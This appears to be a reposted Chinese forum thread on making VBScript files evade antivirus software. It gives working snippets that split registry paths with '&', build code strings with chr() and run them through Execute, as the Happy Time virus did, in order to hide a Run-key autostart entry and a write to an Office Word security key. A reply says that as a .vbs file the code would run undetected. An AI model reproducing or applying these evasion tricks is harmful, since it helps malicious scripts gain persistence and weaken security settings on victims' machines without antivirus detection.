[转载]VBS文件躲避杀毒软件的方法
信息来源:网络以下两个方法在网络上看到的,确实挺实用的,&号两边必须空格格开。
现在杀毒的对vbs相当敏感,只要发现对注册表的xx作,或使用vbs运行命令(加用户) 就可能被杀。下面谈2方法可以简单解决:
1.使用连接符"&" 如:
Set CURObj = createObject("WScript.Shell")
mhk="HK"&"LM\SOFT"&"WARE\Micr"&"osoft\Win"&"dows\Curren"&"tVersion\Run\"
CURObj.RegWrite ""&mhk&"internat.exe","internat.exe"
2.使用Execute函数(BY 动鲨 )
一些杀毒软件,如瑞星,他门会监视网页中的代码,一旦你创建了FSO或写注册表,即使是正常的脚本他也会报告危险,但是当年新欢乐时光也用了FSO怎么就没报警呢?原因是这个病毒使用Execute这个函数来躲过了防火墙,呵呵。病毒将这段声明代码转化为字符串,然后通过Execute(String)函数执行,举个例子
str="set fso=createObject( " & chr(34) & "scrip" & chr(116)& "ing.FileSystemObject"&chr(34)&""
msgbox str
Execute str 问一下
看了你的 我随便式了一下的
<html>
<head>
<script language="VBScript">
str="Set Sh=CreateObject("&chr(34)&"WScrip"&chr(116)&".Shell"&chr(34)&")"
msgbox str
Execute str
key="HK"&"CU\Soft"&"ware\Micr"&"osoft\Off"&"ice\11.0\W"&"ord\Sec""
Sh.RegWrite key,1,"REG_DWORD"
</script>
</head>
<body>
</body>
</html>
但是打开的时候总提示:你页面上的activex控件和本页上的其他部分存在交互 问你是否容许这中交互
这是为何啊 这种方式只是说能逃过杀毒软件,没说ie不会提示啊?
运行结果和未加密时是一样的当然一样会给出提示了.
换种想法,如果这个文件是vbs文件,那就会顺利的执行而杀毒软件无法查得出来了.
CreateObject是个危险的方法对在ie执行中.
页:
[1]